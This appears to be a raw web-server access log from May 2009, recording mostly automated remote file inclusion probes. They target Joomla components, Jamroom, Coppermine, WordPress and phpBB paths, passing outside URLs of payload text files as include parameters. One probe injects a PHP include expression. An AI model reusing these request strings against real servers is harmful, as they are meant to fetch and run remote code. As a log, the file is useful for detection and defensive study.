218.249.36.194 - - [31/May/2009:03:43:10 -0400] "GET //search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:03:43:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [31/May/2009:03:43:49 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:03:43:49 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:03:44:02 -0400] "GET //search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:03:44:02 -0400] "GET /logs//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:03:44:02 -0400] "GET /logs/access_log.Q109052100//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:03:44:28 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:03:44:28 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:03:44:28 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.199.250.194 - - [31/May/2009:03:45:09 -0400] "GET /logs/error_log.Q108053100//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.813"
66.199.250.194 - - [31/May/2009:03:45:09 -0400] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.813"
66.199.250.194 - - [31/May/2009:03:45:09 -0400] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.813"
221.139.104.104 - - [31/May/2009:03:45:10 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:03:45:17 -0400] "GET /logs/access_log.Q109050300//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:03:45:37 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:03:45:38 -0400] "GET /logs/access_log.Q109050300//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:45:58 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:45:58 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:45:58 -0400] "GET /logs/access_log.Q108121900/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:03:46:02 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:03:46:02 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:03:46:02 -0400] "GET /logs/access_log.Q109052300///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:03:46:03 -0400] "GET /logs/access_log.Q109051700///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:03:46:09 -0400] "GET /?sourcedir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:03:46:10 -0400] "GET /logs/?sourcedir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:03:46:10 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:03:46:12 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:03:46:12 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:03:46:12 -0400] "GET /logs/access_log.Q109051700///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:03:46:12 -0400] "GET /logs/access_log.Q109052300///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:03:46:13 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:46:19 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:46:33 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:46:33 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:03:46:35 -0400] "GET /logs/access_log.Q109050300//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
123.143.98.5 - - [31/May/2009:03:47:04 -0400] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
123.143.98.5 - - [31/May/2009:03:47:04 -0400] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
193.239.4.3 - - [31/May/2009:03:47:10 -0400] "GET /logs/error_log.Q108091000//?_SERVER%5BDOCUMENT_ROOT%5D=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
193.239.4.3 - - [31/May/2009:03:47:11 -0400] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
193.239.4.3 - - [31/May/2009:03:47:11 -0400] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 200 3567 "-" "libwww-perl/5.805"
209.200.8.89 - - [31/May/2009:03:47:16 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/test.gif?? HTTP/1.1" 404 260 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
209.200.8.89 - - [31/May/2009:03:47:20 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/test.gif?? HTTP/1.1" 404 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
221.139.104.104 - - [31/May/2009:03:47:29 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:03:47:42 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:03:47:52 -0400] "GET /logs/access_log.Q109051700%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:03:47:52 -0400] "GET /logs/access_log.Q109052300%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:03:47:52 -0400] "GET /logs/access_log.Q109052300%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
64.6.231.215 - - [31/May/2009:03:47:53 -0400] "GET /logs/access_log.Q109051700%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:47:55 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:47:55 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:47:55 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:47:55 -0400] "GET /logs/access_log.Q109051700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:03:48:02 -0400] "GET /logs/?sourcedir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:03:48:02 -0400] "GET /?sourcedir=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:03:48:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
194.63.250.46 - - [31/May/2009:03:48:51 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:48:51 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:48:51 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.142.148.142 - - [31/May/2009:03:49:06 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
200.142.148.142 - - [31/May/2009:03:49:06 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:03:49:16 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:03:49:16 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:03:49:16 -0400] "GET /logs/access_log.Q109051000///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:03:49:20 -0400] "GET /logs/access_log.Q109051500///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:03:49:40 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:03:49:40 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:03:49:40 -0400] "GET /logs/access_log.Q109051700///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:03:49:40 -0400] "GET /logs/access_log.Q109052300///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:03:49:41 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:03:49:41 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:03:49:41 -0400] "GET /logs/access_log.Q109051700///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:03:49:41 -0400] "GET /logs/access_log.Q109052300///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:03:50:12 -0400] "GET /logs/access_log.Q109051000%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:03:50:12 -0400] "GET /logs/access_log.Q109051500%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:50:36 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:50:36 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:50:36 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:03:50:41 -0400] "GET /logs/access_log.Q109052100%20%20//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:03:51:07 -0400] "GET /logs/access_log.Q109050300%20%20//search/**-screens-ppa-inc-functions.inc....php-sources-template.php/admin.php?include_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:51:34 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:51:59 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:51:59 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:51:59 -0400] "GET /logs/access_log.Q108121900/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:52:08 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:52:08 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:52:08 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:52:08 -0400] "GET /logs/access_log.Q109051700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:03:52:17 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.122.160.145 - - [31/May/2009:03:52:34 -0400] "GET /logs/access_log.Q109052100%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
222.122.160.145 - - [31/May/2009:03:52:34 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.122.160.145 - - [31/May/2009:03:52:34 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
203.22.204.193 - - [31/May/2009:03:53:23 -0400] "GET /logs/error_log.Q108051600//include/bbs.lib.inc.php?site_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.76"
209.59.12.99 - - [31/May/2009:03:53:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.239.4.3 - - [31/May/2009:03:53:55 -0400] "GET /logs/access_log.Q109050300///?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
193.239.4.3 - - [31/May/2009:03:53:55 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
193.239.4.3 - - [31/May/2009:03:53:55 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 200 3568 "-" "libwww-perl/5.805"
193.239.4.3 - - [31/May/2009:03:54:02 -0400] "GET /logs/access_log.Q109050300///?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 227 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.239.4.3 - - [31/May/2009:03:54:03 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 200 453 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.223.3.98 - - [31/May/2009:03:54:30 -0400] "GET /logs/access_log.Q109051700%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:03:54:30 -0400] "GET /logs/access_log.Q109052300%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:03:54:31 -0400] "GET /logs/access_log.Q109051700%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:03:54:31 -0400] "GET /logs/access_log.Q109052300%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:54:39 -0400] "GET //modules/xfsection/modify.php?dir_module=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:54:39 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:54:39 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:03:54:45 -0400] "GET //modules/xfsection/modify.php?dir_module=http://stormpages.com/ichy/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
